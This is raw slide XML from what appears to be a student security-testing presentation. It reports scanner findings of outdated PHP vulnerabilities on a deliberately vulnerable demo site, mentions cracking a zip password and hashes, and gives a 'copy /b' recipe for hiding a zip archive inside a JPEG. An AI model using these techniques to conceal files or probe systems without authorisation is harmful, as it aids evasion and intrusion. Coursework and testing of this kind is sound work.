            <a:srgbClr val="FF00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128" name="Google Shape;128;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9123680" y="2979783"/>
            <a:ext cx="548640" cy="41583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129" name="Google Shape;129;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10769600" y="2979783"/>
            <a:ext cx="548640" cy="41583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00"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="10997184" cy="5155692"/>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Clr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>3. Turn on command prompt and access the desktop.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>4. Run the command “copy /b b1.jpg+video.zip draw.jpg”.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>5. This will create draw.jpg file on desktop which is a combination of b1.jpg and video.zip.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="798" name="Google Shape;798;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047576" y="2808827"/>
            <a:ext cx="5687219" cy="136226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01"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="804" name="Google Shape;804;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="1509268"/>
            <a:ext cx="3482340" cy="3563619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784860" y="5539740"/>
            <a:ext cx="85953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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>6. Now right-click on draw.jpg and open it using WinRAR archive.</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102"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="811" name="Google Shape;811;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="654050" y="1301497"/>
            <a:ext cx="6112510" cy="2264664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="812" name="Google Shape;812;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="654050" y="4041279"/>
            <a:ext cx="6112510" cy="2621280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Google Shape;813;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="3764280"/>
            <a:ext cx="621792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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>7. After clicking on “video.mp4”, the video is played</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03"/>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3A3838"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>OBJECTIVES COMPLETED</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="11439144" cy="5259832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We successfully did blackbox vulnerability testing on the given website.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We successfully did blackbox vulnerability testing on the target host machine.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We successfully cracked the password of the given zip file and cracked the hashes  present in the text file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>We successfully found out a way to hide a video behind an image and run the video.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-100965" lvl="0" marL="171450" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>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104"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="825" name="Google Shape;825;p104"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3241040" y="5049520"/>
            <a:ext cx="647192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200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>THANK YOU!</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1"/>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rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.1 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690880" y="1584960"/>
            <a:ext cx="10515600" cy="230832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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="44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2"/>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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>3.PHP &lt; 5.2.11 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="141" name="Google Shape;141;p12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="308150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2131325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.11. Such versions may be affected by several security issues :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An unspecified error occurs in certificate validation inside 'php_openssl_apply_verification_policy’.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An unspecified input validation vulnerability affects the color index in 'imagecolortransparent()’.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An unspecified input validation vulnerability affects exif processing.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Calling 'popen()' with an invalid mode can cause a crash under Windows. (Bug #44683)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An integer overflow in 'xml_utf8_decode()' can make it easier to bypass cross-site scripting and SQL injection protection mechanisms using a specially crafted string with a long UTF-8 encoding. (Bug #49687)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>'proc_open()' can bypass 'safe_mode_protected_env_vars'.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>(Bug #49026)</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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08150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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797000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>The attacker can easily bypass cross-site scripting and SQL injection protection affecting the webpage security.</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08150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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991050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.11 or later.</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142" name="Google Shape;142;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7228509" y="4223656"/>
            <a:ext cx="548640" cy="383177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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143" name="Google Shape;143;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9174479" y="4223655"/>
            <a:ext cx="548640" cy="383177"/>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144" name="Google Shape;144;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10953207" y="4223654"/>
            <a:ext cx="548640" cy="383177"/>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3"/>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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PHP &lt; 5.2.11 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="1617617"/>
            <a:ext cx="11200530" cy="2569028"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
